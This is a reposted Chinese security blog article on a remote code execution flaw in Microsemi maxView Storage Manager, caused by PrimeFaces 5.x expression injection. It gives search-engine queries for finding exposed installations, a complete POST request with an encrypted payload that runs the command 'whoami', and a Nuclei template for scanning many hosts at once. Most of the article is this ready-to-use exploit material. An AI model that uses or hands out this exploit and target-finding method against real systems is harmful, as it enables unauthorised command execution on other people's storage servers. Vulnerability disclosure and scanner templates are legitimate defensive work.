maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞

admin 2024年4月17日14:18:06评论10 views字数 4643阅读15分28秒阅读模式

maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞

maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞
maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞

漏洞简介

maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞
maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞

maxView Storage Manager使查看、监控和配置系统中基于Microsemi RAID适配器构建的所有存储变得简单。方便的图形用户界面(GUI)在Microsemi产品线和支持的操作系统(包括Windows、Linux、VMWare和Solaris)中的外观和操作都相同。使用此单一工具集中管理直连存储(DAS)和网络存储。此外,还可通过maxCache SSD Caching管理现有卷的高级缓存池,并通过Adaptec Intelligent Power Management管理存储功耗。

maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞
maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞

漏洞复现

maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞
maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞

步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~

# 搜索语法"maxView Storage Manager - Login""/manager/com/pmc/maxview/footer/TermsOfUse.xhtml"

步骤二:使用以下POC数据包进行命令执行测试..

POST /maxview/manager/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1Host:127.0.0.1User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)Connection: closeContent-Length: 1573Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzippfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami

maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞

maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞
maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞

批量脚本

maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞
maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞
id: microsemi-maxview-primefaces-5-rceinfo:  name: microsemi-maxview-primefaces-5-rce  author: ly  severity: high  description: microsemi maxView Storage Manager 简化了在构建于RAID控制卡的系统中对所有存储的查看、监控和配置。通过这一款工具就可以集中地管理DAS和网络存储。microsemi maxView Storage Manager 的 dynamiccontent.properties.xhtml 接口对用户传入的参数未进行有效的过滤,导致primefaces 5.x 表达式注入漏洞。  tags: microsemi,rce  metadata:    fofa-qeury: "/manager/com/pmc/maxview/footer/TermsOfUse.xhtml"    veified: true    max-request: 1http:  - raw:      - |                      POST /maxview/manager/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1        Content-Type: application/x-www-form-urlencoded        User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)        Host:         pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd={{rce}}    payloads:      rce:        - "echo 12w456~"    matchers:           - type: dsl        name: rce        dsl:          - "status_code_1 == 200 && contains(body,'12w456~') && contains(header,'text/plain')" 

        

原文始发于微信公众号(揽月安全团队):maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月17日14:18:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   maxView 系统 dynamiccontent.properties.xhtml 远程代码执行漏洞http://cn-sec.com/archives/2665930.html

发表评论

匿名网友 填写信息